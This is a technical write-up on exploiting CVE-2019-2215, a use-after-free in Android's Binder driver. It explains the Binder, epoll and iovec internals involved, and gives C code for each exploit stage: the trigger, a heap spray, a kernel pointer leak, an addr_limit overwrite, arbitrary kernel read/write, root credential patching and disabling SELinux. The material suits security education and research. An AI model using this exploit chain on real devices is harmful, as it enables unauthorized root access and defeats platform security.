Brief introduction to Binder, the eventpoll subsystem and Vectored I/O

Binder is an Android-only kernel driver used for Inter-Process Communication (IPC). We can interact with Binder through file operations like ioctl(). Another useful property is that /dev/binder is accessible to unprivileged users.

The eventpoll subsystem (also known as epoll) is a scalable I/O event notification mechanism that monitors multiple file descriptors to determine which of them are ready for I/O.
It is represented in the Linux kernel by the eventpoll struct:

struct eventpoll {
	/*
	 * This mutex is used to ensure that files are not removed
	 * while epoll is using them. This is held during the event
	 * collection loop, the file cleanup path, the epoll file exit
	 * code and the ctl operations.
	 */
	struct mutex mtx;

	/* Wait queue used by sys_epoll_wait() */
	wait_queue_head_t wq;

	/* Wait queue used by file->poll() */
	wait_queue_head_t poll_wait;

	/* List of ready file descriptors */
	struct list_head rdllist;

	/* Lock which protects rdllist and ovflist */
	rwlock_t lock;

	/* RB tree root used to store monitored fd structs */
	struct rb_root_cached rbr;

	/*
	 * This is a single linked list that chains all the "struct epitem" that
	 * happened while transferring ready events to userspace w/out
	 * holding ->lock.
	 */
	struct epitem *ovflist;

	/* wakeup_source used when ep_scan_ready_list is running */
	struct wakeup_source *ws;

	/* The user that created the eventpoll descriptor */
	struct user_struct *user;

	struct file *file;

	/* used to optimize loop detection check */
	u64 gen;
	struct hlist_head refs;

#ifdef CONFIG_NET_RX_BUSY_POLL
	/* used to track busy poll napi_id */
	unsigned int napi_id;
#endif

#ifdef CONFIG_DEBUG_LOCK_ALLOC
	/* tracks wakeup nests for lockdep validation */
	u8 nests;
#endif
};

Vectored I/O is a way to write data from multiple buffers into a single stream, or to read a single stream into multiple buffers. On Linux / Android we can use vectored I/O through pipes or network sockets, with syscalls like writev(), readv() and recvmsg().

An iovec in the kernel is represented by the iovec struct:

struct iovec {
	void *   iov_base;      /* [XSI] Base address of I/O memory region */
	size_t   iov_len;       /* [XSI] Size of region iov_base points to */
};

iov_base points to the buffer with the data and iov_len is the length of the data.

When we read() or write() through an iovec, iov_len bytes are read from / written to the address stored in iov_base, which makes for a great exploitation primitive if we’re able to corrupt the iov_base pointer. Iovecs are also a convenient target because the kernel copies the whole array into a temporary kernel allocation before processing it, so by choosing the number of iovecs we control which kmalloc cache the array lands in.
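As a concrete illustration (a minimal sketch, not taken from the exploit): when an iovec array with more than UIO_FASTIOV (8) entries is passed to writev(), the kernel kmallocs a copy of the whole array, sized count * sizeof(struct iovec), so the entry count picks the slab cache. For example, 25 entries give a 400-byte allocation, which falls into kmalloc-512:

#include <stdio.h>
#include <unistd.h>
#include <sys/uio.h>

#define NUM_IOVECS 25   /* 25 * sizeof(struct iovec) = 25 * 16 = 400 bytes -> kmalloc-512 */

int main(void) {
    int fds[2];
    char data[16] = "AAAAAAAAAAAAAAA";
    struct iovec iov[NUM_IOVECS];

    if (pipe(fds))
        return 1;

    /* every entry points to the same small userland buffer; what matters
     * for the heap spray is only the *number* of entries, because the
     * kernel copies the whole array into a kmalloc'd allocation of
     * NUM_IOVECS * 16 bytes before processing it */
    for (int i = 0; i < NUM_IOVECS; i++) {
        iov[i].iov_base = data;
        iov[i].iov_len = sizeof(data);
    }

    ssize_t n = writev(fds[1], iov, NUM_IOVECS);
    printf("writev() wrote %zd bytes\n", n);
    return 0;
}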

Brief introduction to CVE-2019-2215

Binder has an exit command implemented through ioctl(), BINDER_THREAD_EXIT, which frees the binder_thread struct:

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
  [...]
	switch (cmd) {
	[...]
	case BINDER_THREAD_EXIT:
		binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
			     proc->pid, thread->pid);
		binder_thread_release(proc, thread);
		thread = NULL;
		break;
	[...]
}
static int binder_thread_release(struct binder_proc *proc,
				 struct binder_thread *thread)
{
	struct binder_transaction *t;
	struct binder_transaction *send_reply = NULL;
	int active_transactions = 0;
	struct binder_transaction *last_t = NULL;

	[...]

	if (send_reply)
		binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
	binder_release_work(proc, &thread->todo);
	binder_thread_dec_tmpref(thread);
	return active_transactions;
}
static void binder_thread_dec_tmpref(struct binder_thread *thread)
{
	/*
	 * atomic is used to protect the counter value while
	 * it cannot reach zero or thread->is_dead is false
	 */
	binder_inner_proc_lock(thread->proc);
	atomic_dec(&thread->tmp_ref);
	if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {
		binder_inner_proc_unlock(thread->proc);
		binder_free_thread(thread);
		return;
	}
	binder_inner_proc_unlock(thread->proc);
}
static void binder_free_thread(struct binder_thread *thread)
{
	BUG_ON(!list_empty(&thread->todo));
	binder_stats_deleted(BINDER_STAT_THREAD);
	binder_proc_dec_tmpref(thread->proc);
	put_task_struct(thread->task);
	kfree(thread);
}

Here in binder_free_thread() the kfree() frees the binder_thread struct. The problem arises when an EPOLL_CTL_ADD operation is issued before the binder_thread struct is freed: in that case an epoll wait queue entry is added to the wait queue (binder_thread->wait), and the binder_thread struct becomes linked to the eppoll_entry. If we now call BINDER_THREAD_EXIT, the binder_thread struct is freed, but it isn’t removed from the eppoll_entry’s linked list, so when we later issue an EPOLL_CTL_DEL operation, the kernel accesses the freed binder_thread wait queue, which leads to a use-after-free.
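Putting the pieces together, a minimal trigger sketch (in the spirit of the public PoC, untested here; the BINDER_THREAD_EXIT value comes from the binder UAPI header) looks like this:

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <linux/ioctl.h>

/* from include/uapi/linux/android/binder.h */
#define BINDER_THREAD_EXIT _IOW('b', 8, int)

int main(void) {
    int binder_fd, epoll_fd;
    struct epoll_event event = { .events = EPOLLIN };

    binder_fd = open("/dev/binder", O_RDONLY);
    epoll_fd = epoll_create(1);
    if (binder_fd < 0 || epoll_fd < 0)
        return 1;

    /* EPOLL_CTL_ADD: an epoll wait queue entry is linked into binder_thread->wait */
    epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event);

    /* BINDER_THREAD_EXIT: binder_thread is kfree()d, but the wait queue
     * entry still points into the freed allocation */
    ioctl(binder_fd, BINDER_THREAD_EXIT, 0);

    /* EPOLL_CTL_DEL: ep_unregister_pollwait() walks the freed wait queue
     * -> use-after-free */
    epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);

    return 0;
}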

Unlink primitive

When we issue the EPOLL_CTL_DEL operation, a chain of functions is called.
The important one is remove_wait_queue() (notice that its wait_queue_head parameter points to the freed wait queue).

int do_epoll_ctl(int epfd, int op, int fd, struct epoll_event *epds,
		 bool nonblock)
{
	int error;
	int full_check = 0;
	struct fd f, tf;
	struct eventpoll *ep;
	struct epitem *epi;
	struct eventpoll *tep = NULL;

	[...]

	switch (op) {
	[...]
	case EPOLL_CTL_DEL:
		if (epi)
			error = ep_remove(ep, epi);
		else
			error = -ENOENT;
		break;
	[...]

	return error;
}
static int ep_remove(struct eventpoll *ep, struct epitem *epi)
{
	struct file *file = epi->ffd.file;
	struct epitems_head *to_free;
	struct hlist_head *head;

	lockdep_assert_irqs_enabled();

	/*
	 * Removes poll wait queue hooks.
	 */
	ep_unregister_pollwait(ep, epi);

	[...]

	return 0;
}
static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
	struct eppoll_entry **p = &epi->pwqlist;
	struct eppoll_entry *pwq;

	while ((pwq = *p) != NULL) {
		*p = pwq->next;
		ep_remove_wait_queue(pwq);
		kmem_cache_free(pwq_cache, pwq);
	}
}
static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
	wait_queue_head_t *whead;

	rcu_read_lock();
	/*
	 * If it is cleared by POLLFREE, it should be rcu-safe.
	 * If we read NULL we need a barrier paired with
	 * smp_store_release() in ep_poll_callback(), otherwise
	 * we rely on whead->lock.
	 */
	whead = smp_load_acquire(&pwq->whead);
	if (whead)
		remove_wait_queue(whead, &pwq->wait);
	rcu_read_unlock();
}
void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
	unsigned long flags;

	spin_lock_irqsave(&wq_head->lock, flags);
	__remove_wait_queue(wq_head, wq_entry);
	spin_unlock_irqrestore(&wq_head->lock, flags);
}
static inline void
__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
	list_del(&wq_entry->entry);
}
static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
static inline void __list_del(struct list_head *prev, struct list_head *next)
{
	next->prev = prev;
	prev->next = next;
}

As we can see, __list_del() is eventually called. Since the eppoll entry is the only element in the (freed) wait queue, both prev and next point to the list head, so the address of binder_thread->wait’s list head is written into binder_thread->wait.task_list.next and binder_thread->wait.task_list.prev.
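To see the primitive more concretely, here is a tiny userland model (purely illustrative, mirroring the kernel’s struct list_head) of what the unlink does when the eppoll entry is the only element of the freed wait queue: the address of the list head itself ends up in both of its pointer fields.

#include <stdio.h>

/* same layout as the kernel's struct list_head */
struct list_head { struct list_head *next, *prev; };

static void __list_del(struct list_head *prev, struct list_head *next) {
    next->prev = prev;
    prev->next = next;
}

int main(void) {
    struct list_head head;   /* stands in for binder_thread->wait's list head */
    struct list_head entry;  /* stands in for the eppoll entry's wait queue entry */

    /* one-element list: head <-> entry <-> head */
    head.next = head.prev = &entry;
    entry.next = entry.prev = &head;

    /* list_del(&entry): since prev == next == &head, this writes &head
     * into head.next and head.prev */
    __list_del(entry.prev, entry.next);

    printf("&head     = %p\n", (void *)&head);
    printf("head.next = %p\n", (void *)head.next);
    printf("head.prev = %p\n", (void *)head.prev);
    return 0;
}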

Leaking task_struct kernel pointer

task_struct_leak() is responsible for leaking the task_struct pointer. It first does some preliminary work: it opens /dev/binder, allocates an epoll instance and links it, creates a pipe (which will be used later to read back the leaked address) and shrinks the pipe size, since we’ll need to fill it up completely later and a smaller pipe makes that easier. We also mmap() a 0x1000-byte buffer and set up the iovecs.

void task_struct_leak() {
    printf("\t[+] opening /dev/binder\n");
    open_binder();

    printf("\t[+] allocating epoll\n");
    epoll_alloc();

    printf("\t[+] linking epoll\n");
    epoll_link();

    printf("\t[+] setting up a pipe\n");
    if( pipe(pipe_fd) ) {
        printf("\t[-] failed to allocate a pipe\n");
        exit(-1);
    }

    printf("\t[+] changing pipe size to 0x1000\n");
    if (fcntl(READ_PIPE, F_SETPIPE_SZ, PAGE_SIZE) == -1) {
        printf("\t[-] unable to change the pipe capacity\n");
        exit(-1);
    }

    /* used later to unblock the write and avoid deadlocking */
    printf("\t[+] allocating the dummy page\n");
    dummy_page = map_dummy_page();

    if(!dummy_page) {
        printf("\t[-] unable to mmap the dummy page\n");
        exit(-1);
    }

    printf("\t[+] crafting iovecs to leak task_struct\n");
    iovec[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
    iovec[IOVEC_OVERLAP_INDEX].iov_len = PAGE_SIZE;
    iovec[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
    iovec[IOVEC_OVERLAP_INDEX + 1].iov_len = PAGE_SIZE;
    [...]
}

Now the interesting part comes in: we use fork() to create a child process, which sleeps for 2 seconds. In the meantime the parent process frees the binder_thread struct and calls writev() with 25 iovecs: since every iovec struct is 16 bytes, the array is 400 bytes and gets allocated from kmalloc-512, the same cache as the 408-byte binder_thread struct, so it reallocates the slot we just freed. We only initialize entries [10] and [11], so that the kernel won’t do anything with the other entries, which aren’t useful for exploitation.

pid_t child = fork();
if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    [...]
}

/* free binder_thread struct */
binder_thread_free();

/* reallocates binder_thread with iovecs */
nBytesWritten = writev(WRITE_PIPE, iovec, IOVEC_SIZE);

The iovec array now overlaps the freed binder_thread struct; this is how it looks in memory:

[Figure: iovec_spray — the sprayed iovec array overlapping the freed binder_thread struct]

Now let’s look at which values overlap the binder_thread fields, and why.

iovec[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
iovec[IOVEC_OVERLAP_INDEX].iov_len = PAGE_SIZE;
iovec[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
iovec[IOVEC_OVERLAP_INDEX + 1].iov_len = PAGE_SIZE;

We set the first iov_base to the mmap()ed page to avoid deadlocking (the address looks like an unlocked lock), and we set the corresponding iov_len to PAGE_SIZE, which is also the size of the pipe. This way the kernel won’t process the next iovec immediately: the pipe fills up, and we’ll have to manually read() from the pipe before it continues.

We initialize the other iovec’s iov_base with an invalid address, since it’ll be overwritten with a kernel address anyway.

Now the cool part comes in: the child triggers the unlink, so a pointer to binder_thread->wait’s list head is written to iovec[10].iov_len (which overlaps binder_thread->wait.task_list.next) and to iovec[11].iov_base (which overlaps binder_thread->wait.task_list.prev).

pid_t child = fork();
if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    [...]
    exit(0);
}
void unlink_kptr_write() {
    epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
}

We triggered the unlink, and iovec[11].iov_base and iovec[10].iov_len (the latter isn’t represented in the figure since it’s not useful for exploitation) have been overwritten with the address of binder_thread->wait’s list head. This is how it looks in memory:

[Figure: unlink_kptr_write — iovec[10].iov_len and iovec[11].iov_base overwritten by the unlink]

Now the child reads from the pipe. This drains the data produced from the first valid iovec (the one pointing to the mmap()ed page) and unblocks the parent’s writev(); we don’t care about the contents of this read.

pid_t child = fork();
if (!child) {
    [...]
    /* dummy read */
    nBytesRead = read(READ_PIPE, pipe_read_buffer, sizeof(pipe_read_buffer));
    [...]
}

The child’s read unblocks the parent’s writev(), which now processes the next iovec, iovec[11]. Its iov_base contains a pointer to binder_thread->wait’s list head, so the kernel writes data from there into the pipe. The parent then reads from the pipe again, and in the data we get back in userland we can find our task_struct pointer at offset 0xE8.

nBytesRead = read(READ_PIPE, pipe_read_buffer, sizeof(pipe_read_buffer));

if (nBytesRead != PAGE_SIZE) {
    printf("\t[-] parent failed to read dummy data: 0x%x instead of 0x%x", nBytesRead, PAGE_SIZE);
    exit(-1);
}

/* the task_struct kptr is at offset 0xE8 */
task_struct_kptr = *(uint64_t*)(pipe_read_buffer + PIPE_READ_KPTR_OFFSET);

Note that macros like READ_PIPE / WRITE_PIPE and KREAD_PIPE / KWRITE_PIPE are just wrappers for the read and write ends of the corresponding pipes.
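For completeness, here are plausible definitions for those macros and for the other constants used in the snippets; they are assumptions reconstructed from the description above (25 iovecs, wait queue overlapping entries 10 and 11), not necessarily the author’s exact code:

/* assumed definitions, reconstructed from the description */
#ifndef PAGE_SIZE
#define PAGE_SIZE             0x1000
#endif
#define IOVEC_SIZE            25        /* 25 * 16 = 400 bytes -> kmalloc-512 */
#define IOVEC_OVERLAP_INDEX   10        /* entries overlapping binder_thread->wait */
#define PIPE_READ_KPTR_OFFSET 0xE8      /* offset of the task_struct pointer in the leaked data */

#define READ_PIPE   pipe_fd[0]          /* read end of the leak pipe */
#define WRITE_PIPE  pipe_fd[1]          /* write end of the leak pipe */
#define KREAD_PIPE  kernel_rw_pipe[0]   /* read end of the arbitrary r/w pipe (name assumed) */
#define KWRITE_PIPE kernel_rw_pipe[1]   /* write end of the arbitrary r/w pipe (name assumed) */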

Arbitrary Write

Now it’s time to use the unlink primitive to get an arbitrary write. Once we have it, we’ll overwrite addr_limit in task_struct with 0xFFFFFFFFFFFFFFFE (on ARM64 there’s a check against addr_limit that doesn’t allow setting it to 0xFFFFFFFFFFFFFFFF), so that we can access the whole address space, since addr_limit indicates the highest address we’re allowed to write to.

This time we’ll use socketpair(), since some technical limitations prevent us from using pipes to spray the iovec array in this stage. We create the socketpair and write() a single garbage byte to it (needed to "initialize" recvmsg()). As in the previous stage, we create a child process that sleeps for 2 seconds; in the meantime the parent frees binder_thread and sprays the iovec array, this time using recvmsg().

/* garbage data */
char garbage_data[] = { 0x41 };

printf("\t[+] setting up a socketpair\n");
if( socketpair(AF_UNIX, SOCK_STREAM, 0, sock_fd) == -1 ) {
    printf("\t[-] failed to create socketpair\n");
    return -1;
}

/* needed to "init" recvmsg() */
printf("\t[+] writing garbage to the socket\n");
nBytesWritten = write(WRITE_SOCK, &garbage_data, sizeof(garbage_data));

if(nBytesWritten != sizeof(garbage_data)) {
    printf("\t[-] write() returned 0x%x instead of 0x%lx\n", nBytesWritten, sizeof(garbage_data));
    exit(-1);
}

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    [...]
}

/* free binder_thread struct which is gonna be reallocated by the child's write() */
binder_thread_free();

struct msghdr message = {0};
message.msg_iov = iovec;
message.msg_iovlen = IOVEC_SIZE;

/* this reallocates the binder_thread struct with our iovecs */
int received_bytes_addr_limit = recvmsg(RECVMSG_SOCK, &message, MSG_WAITALL);

The memory layout will be the same as the one after the spray done by task_struct_leak:

[Figure: iovec_spray — the sprayed iovec array overlapping the freed binder_thread struct]

Now let’s look at which values overlap the binder_thread fields, and why.

iovec[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
iovec[IOVEC_OVERLAP_INDEX].iov_len = 1;
iovec[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
iovec[IOVEC_OVERLAP_INDEX + 1].iov_len = 0x8 + 0x8 + 0x8 + 0x8;
iovec[IOVEC_OVERLAP_INDEX + 2].iov_base = (void *) 0x42424242;
iovec[IOVEC_OVERLAP_INDEX + 2].iov_len = 0x8;

As before, we set the iov_base of the first (valid) iovec to the mmap()ed page to avoid locking issues. Its iov_len can be any value; we just use 1 to get a smaller return value from recvmsg() (which returns the sum of the iov_len of all processed iovecs). The other two iov_base pointers are set to dummy addresses because they’ll be overwritten later, but the iov_len fields are important: the second one has to be 0x8 + 0x8 + 0x8 + 0x8 (we’ll see why shortly), and the last one is set to 0x8, the size of the arbitrary write, since we’re going to write a kernel pointer, which is 8 bytes long.

Now that we sprayed our iovec array, the child triggers the unlink as we did in the previous stage, so that iovec[11].iov_base points to iovec[10].iov_len.

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    [...]
}

The memory layout will be the same as the one after the unlink done by task_struct_leak:

[Figure: unlink_kptr_write — iovec[10].iov_len and iovec[11].iov_base overwritten by the unlink]

Now the child calls write() passing final_sock_data as data to send.

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    nBytesWritten = write(WRITE_SOCK, final_sock_data, sizeof(final_sock_data));
    [...]
}

Let’s look at the data sent through write():

unsigned long final_sock_data[] = {
    0x1,                                    // overwrites iovec[IOVEC_OVERLAP_INDEX].iov_len
    0x41414141,                             // overwrites iovec[IOVEC_OVERLAP_INDEX + 1].iov_base
    0x8 + 0x8 + 0x8 + 0x8,                  // overwrites iovec[IOVEC_OVERLAP_INDEX + 1].iov_len
    task_struct_kptr + ADDR_LIMIT_OFFSET,   // overwrites iovec[IOVEC_OVERLAP_INDEX + 2].iov_base
    0xFFFFFFFFFFFFFFFE                      // written through iovec[IOVEC_OVERLAP_INDEX + 2] to addr_limit
};

Now that we called write(), the kernel processes the valid iovecs. The first one is iovec[10], which just receives a single byte into the mmap()ed page; it isn’t important by itself, we only need it so that the next iovec is processed after it has been corrupted by the unlink. Next the kernel processes iovec[11]: remember that we corrupted its iov_base with a pointer to iovec[10].iov_len, so it writes 0x20 bytes (since we set iovec[11].iov_len to 0x8 + 0x8 + 0x8 + 0x8) of final_sock_data over the iovec array, starting at iovec[10].iov_len.

As a result, we’re able to point iovec[12].iov_base at an arbitrary address, in this case the address of addr_limit.

[Figure: iovec_processing_11 — iovec[12].iov_base overwritten with the address of addr_limit]

Now that the kernel has finished processing iovec[11], it starts processing iovec[12]. As we just saw, its iov_base has been overwritten with the address of addr_limit, so the kernel writes iov_len (0x8) bytes of the remaining final_sock_data to addr_limit: in this case, 0xFFFFFFFFFFFFFFFE!

We can easily check that all the writes went through by looking at the return values of write() and recvmsg(): write() should return the size of final_sock_data, and recvmsg() should return the sum of the iov_len of all the valid iovecs.

pid_t child = fork();
if (!child) {
    [...]
    nBytesWritten = write(WRITE_SOCK, final_sock_data, sizeof(final_sock_data));

    /* ensures that the write has been correctly done */
    if (nBytesWritten != sizeof(final_sock_data)) {
        printf("\t[-] write() returned 0x%x instead of 0x%lx\n", nBytesWritten, sizeof(final_sock_data));
        exit(-1);
    }
    exit(0);
}
[...]
int expected_bytes_addr_limit = iovec[IOVEC_OVERLAP_INDEX].iov_len +
                                iovec[IOVEC_OVERLAP_INDEX + 1].iov_len +
                                iovec[IOVEC_OVERLAP_INDEX + 2].iov_len;

if(received_bytes_addr_limit != expected_bytes_addr_limit) {
    printf("\t[-] recvmsg() wasn't able to overwrite addr_limit: returned 0x%x instead of 0x%x\n", received_bytes_addr_limit, expected_bytes_addr_limit);
    exit(-1);
}

Stable arbitrary kernel r/w

Now that we overwrote addr_limit, getting arbitrary kernel r/w is as easy as using pipes :p

We create a new pipe (a new pair of pipe fds) dedicated to reading and writing arbitrary addresses; after that the journey is easy. For an arbitrary write we just write() the data we want to write into the pipe, then read() it back out of the pipe directly into the kernel address we want to write to.

int kwrite(uint64_t kaddr, void* user_value, size_t size) {
    /* doing this to avoid possible issues */
    if(size > 0x1000) {
        printf("\t[-] writing more than a kernel page can cause issues\n");
    }
    /* writes user's value to pipe */
    if( write(KWRITE_PIPE, user_value, size) == -1 ) {
        printf("\t[-] failed to write the value to the pipe\n");
        return -1;
    }
    /* reads the value back from the pipe, writing it directly to the kernel address */
    if( read(KREAD_PIPE, (void*)kaddr, size) == -1 ) {
        printf("\t[-] failed to write to kernel memory\n");
        return -1;
    }
    return 0;
}

For the arbitrary read it’s exactly the opposite: we write() directly from the kernel address into the pipe, then read() the data back from the pipe into a userland buffer.

int kread(uint64_t kaddr, void *user_value, size_t size) {
    /* doing this to avoid possible issues */
    if(size > 0x1000) {
        printf("\t[-] reading more than a kernel page can cause issues\n");
    }
    /* writes kernel data to pipe */
    if( write(KWRITE_PIPE, (void*)kaddr, size) != size ) {
        printf("\t[-] failed to read kernel data\n");
        return -1;
    }
    /* reads the kernel data back from the pipe into the userland buffer */
    if( read(KREAD_PIPE, user_value, size) != size ) {
        printf("\t[-] failed to copy data to userspace\n");
        return -1;
    }
    return 0;
}
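The later stages call fixed-size helpers (kread32(), kread64(), kwrite32() and kwrite64()) that aren’t shown in this post. A minimal sketch built on top of the kread() and kwrite() primitives above (an assumption, not necessarily the author’s implementation) could look like this:

#include <stdint.h>

/* fixed-size wrappers around the pipe-based kread()/kwrite() primitives above */
int kread32(uint64_t kaddr) {
    uint32_t value = 0;
    if (kread(kaddr, &value, sizeof(value)))
        return -1;              /* matches the "ret != -1" check used later */
    return (int)value;
}

uint64_t kread64(uint64_t kaddr) {
    uint64_t value = 0;
    kread(kaddr, &value, sizeof(value));
    return value;
}

int kwrite32(uint64_t kaddr, uint32_t value) {
    return kwrite(kaddr, &value, sizeof(value));
}

int kwrite64(uint64_t kaddr, uint64_t value) {
    return kwrite(kaddr, &value, sizeof(value));
}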

Getting root privileges

Now that we can write to every address in the address space, we can overwrite our task’s cred struct so that it matches init_cred (the credentials of the first task in Linux).

struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};

Luckily for us, a pointer to the cred struct is stored inside task_struct, so we can just read it with kread64() and then write the values from init_cred into each member of the struct (using the relative offsets).

void kernel_cred_patch() {
    printf("\t[+] reading cred pointer from task_struct\n");
    cred_kptr = kread64(task_cred_kptr);

    /* basically commit_cred(prepare_kernel_cred(0)); */
    kwrite32(cred_kptr + CRED_UID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_GID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_SUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_SGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_EUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_EGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_FSUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_FSGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_SECUREBITS_OFFSET, SECUREBITS_DEFAULT);
    kwrite64(cred_kptr + CRED_CAP_INHERITABLE_OFFSET, CAP_EMPTY_SET);
    kwrite64(cred_kptr + CRED_CAP_PERMITTED_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_EFFECTIVE_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_BSET_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_AMBIENT_OFFSET, CAP_EMPTY_SET);
}
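A quick sanity check after patching the credentials (not part of the original code, just a small assumed helper) is to verify that our UID is now 0:

#include <stdio.h>
#include <unistd.h>

/* call after kernel_cred_patch() */
void check_root(void) {
    if (getuid() == 0 && geteuid() == 0)
        printf("\t[+] got root: uid=%d euid=%d\n", getuid(), geteuid());
    else
        printf("\t[-] still unprivileged: uid=%d\n", getuid());
}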

Disable SELinux enforcement

Now that we have root privileges we need to disable SELinux enforcement. That’s achievable by overwriting a global int called selinux_enforcing with 0, but we need the kernel base first: once we know where the kernel starts, we can locate selinux_enforcing using its relative offset (which may change between devices and kernel versions).

void disable_selinux_enforcing() {
    printf("\t[+] reading init_nsproxy pointer from task_struct\n");
    init_nsproxy_kptr = kread64(task_init_nsproxy_kptr);

    kbase = init_nsproxy_kptr - SYMBOL_OFFSET_INIT_NSPROXY;
    printf("\t[+] kernel base: 0x%lx\n", kbase);

    uint64_t selinux_enforcing_kptr = kbase + SYMBOL_OFFSET_SELINUX_ENFORCING;
    int ret = kread32(selinux_enforcing_kptr);
    if( ret && ret != -1 ) {
        printf("\t[+] SELinux enforcing is enabled\n");
        if( !kwrite32(selinux_enforcing_kptr, 0x0) ) {
            printf("\t[+] successfully disabled SELinux enforcing\n");
        }
    } else if(ret == 0) {
        printf("\t[+] SELinux enforcing is disabled\n");
    }
}

Credits

Thanks to HackSysTeam for the Android kernel exploitation workshop, SpecterDev for his writeup about the same vulnerability, and Maddie Stone for the original writeup.
You can find my exploit implementation here.